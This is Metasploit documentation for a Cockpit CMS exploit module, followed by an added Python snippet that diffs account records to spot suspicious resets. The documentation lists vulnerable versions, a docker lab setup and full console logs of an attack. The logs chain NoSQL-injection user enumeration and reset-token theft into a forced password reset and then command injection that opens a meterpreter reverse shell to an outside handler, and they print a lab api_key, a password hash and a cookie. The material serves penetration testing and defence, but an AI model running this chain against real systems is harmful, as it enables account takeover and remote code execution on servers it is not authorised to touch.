metasploit-framework/documentation/modules/exploit/multi/http/cockpit_cms_rce.md


Vulnerable Application

This module exploits two NoSQLi vulnerabilities to retrieve the user list and the password reset tokens from the system. The account named in USER is then targeted and its password is reset.

A command injection vulnerability is then used to execute the payload. While it is possible to upload a payload and execute it, the command injection writes nothing to disk, which is stealthier.

The following versions of Cockpit CMS contain all the necessary vulnerabilities for exploitation:

  • 0.11.1
  • 0.11.0
  • 0.10.2
  • 0.10.1
  • 0.10.0

Install

Use docker:

docker run -p 8080:80 agentejo/cockpit:0.10.0

Or follow https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/

MAKE SURE TO BROWSE TO /install TO FINISH INSTALL!!

Some useful addresses that don't seem to be well documented:

  • /finder for a file system browser
  • /accounts for adding accounts
  • /install to finish install

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/cockpit_cms_rce
  4. Do: run
  5. Do: set USER [user]
  6. Do: run
  7. You should get a shell.

Options

ENUM_USERS

Use CVE-2020-35846 to enumerate users on the system.

USER

The username whose password is reset; the module then logs in as this user to perform the command injection. Defaults to ''.

Scenarios

Cockpit CMS 0.11.1 on Ubuntu 20.04

Obtain list of users

[*] Processing cockpit.rb for ERB directives.
resource (cockpit.rb)> use exploit/multi/http/cockpit_cms_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (cockpit.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cockpit.rb)> set verbose true
verbose => true
msf6 exploit(multi/http/cockpit_cms_rce) > check

[*] Attempting Username Enumeration (CVE-2020-35846)
[*] 2.2.2.2:80 - The target appears to be vulnerable.
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
[-] Exploit aborted due to failure: bad-config: 2.2.2.2:80 - User to exploit required
[*] Exploit completed, but no session was created.

Exploit user

msf6 exploit(multi/http/cockpit_cms_rce) > set user asdf22
user => asdf22
msf6 exploit(multi/http/cockpit_cms_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
[*] Obtaining reset tokens (CVE-2020-35847)
[*] Attempting to generate tokens
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c"]
[*] Checking token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
[*] Obtaining user info
[*]   user: asdf22
[*]   email: none@none.com
[*]   active: true
[*]   group: admin
[*]   i18n: en
[*]   api_key: account-8d9e39cf206a7392d292efc281e824
[*]   password: $2y$10$R4mShvdxnXxxnTH85apRLedSWfYbOk4qsGQwG7apOfdQBVRnhEcme
[*]   name: dsf22
[*]   _modified: 1618755509
[*]   _created: 1618755500
[*]   _id: 607c3fac62336679e30002c3
[*]   _reset_token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
[*]   md5email: 3eda6fcd3204ef285fa52176c28c4d3e
[+] Changing password to BoicMQSMPv
[+] Password update successful
[*] Attempting login
[+] Valid cookie for asdf22: c8695f6d766afc426d0e99f58fb04e0d=d3t7e356h03eufhuc55g91kgsb;
[*] Attempting RCE
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:37260) at 2021-04-18 10:26:27 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu2004
OS          : Linux ubuntu2004 5.4.0-56-generic #62-Ubuntu SMP Mon Nov 23 19:20:19 UTC 2020 x86_64
Meterpreter : php/linux
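The "user info" record the module prints above (user, group, password, _modified, _reset_token) is also what a defender has to work with when reviewing a Cockpit instance after the fact. The following is an added defensive example, not part of the module or its documentation: it diffs two snapshots of the accounts collection and flags password changes made while a reset token was pending, promotions to the admin group, and admin accounts that appeared between snapshots. The snapshot records, placeholder hashes, the 300-second window and the finding labels are constructed assumptions.

```python
"""Snapshot-diff hunting check for Cockpit CMS account records (added example).

Field names follow the record the module prints in its verbose output; the
sample snapshots, hash placeholders, thresholds and reasons are constructed.
"""
from typing import Dict, List, Tuple

# Constructed snapshots of the accounts collection, e.g. exported before and
# after an incident window. Hashes are placeholders, not real bcrypt output.
BEFORE: List[Dict] = [
    {"user": "admin", "group": "admin", "password": "$2y$10$hashA",
     "_modified": 1618700000, "_reset_token": None},
    {"user": "asdf22", "group": "admin", "password": "$2y$10$hashB",
     "_modified": 1618755500, "_reset_token": "rp-EXAMPLE-TOKEN"},
    {"user": "editor", "group": "editor", "password": "$2y$10$hashD",
     "_modified": 1618600000, "_reset_token": None},
]
AFTER: List[Dict] = [
    {"user": "admin", "group": "admin", "password": "$2y$10$hashA",
     "_modified": 1618700000, "_reset_token": None},
    {"user": "asdf22", "group": "admin", "password": "$2y$10$hashC",
     "_modified": 1618755540, "_reset_token": None},
    {"user": "editor", "group": "admin", "password": "$2y$10$hashD",
     "_modified": 1618755600, "_reset_token": None},
    {"user": "newacct", "group": "admin", "password": "$2y$10$hashE",
     "_modified": 1618755650, "_reset_token": None},
]


def account_findings(before: List[Dict], after: List[Dict],
                     max_age: int = 300) -> List[Tuple[str, str]]:
    """Return (user, reason) pairs worth reviewing: a password hash that changed
    within max_age seconds of a pending reset token, an account promoted to the
    admin group, and an admin account absent from the earlier snapshot."""
    prev = {r["user"]: r for r in before}
    findings: List[Tuple[str, str]] = []
    for rec in after:
        old = prev.get(rec["user"])
        if old is None:
            if rec["group"] == "admin":
                findings.append((rec["user"], "new admin account"))
            continue
        if (old["password"] != rec["password"] and old.get("_reset_token")
                and rec["_modified"] - old["_modified"] <= max_age):
            findings.append((rec["user"], "password changed via reset token"))
        if old["group"] != "admin" and rec["group"] == "admin":
            findings.append((rec["user"], "promoted to admin"))
    return findings
```

A legitimate self-service reset produces the same first finding, so treat it as a triage cue to correlate with the request source, not as proof of compromise; rotating the api_key shown in the record is part of the cleanup either way.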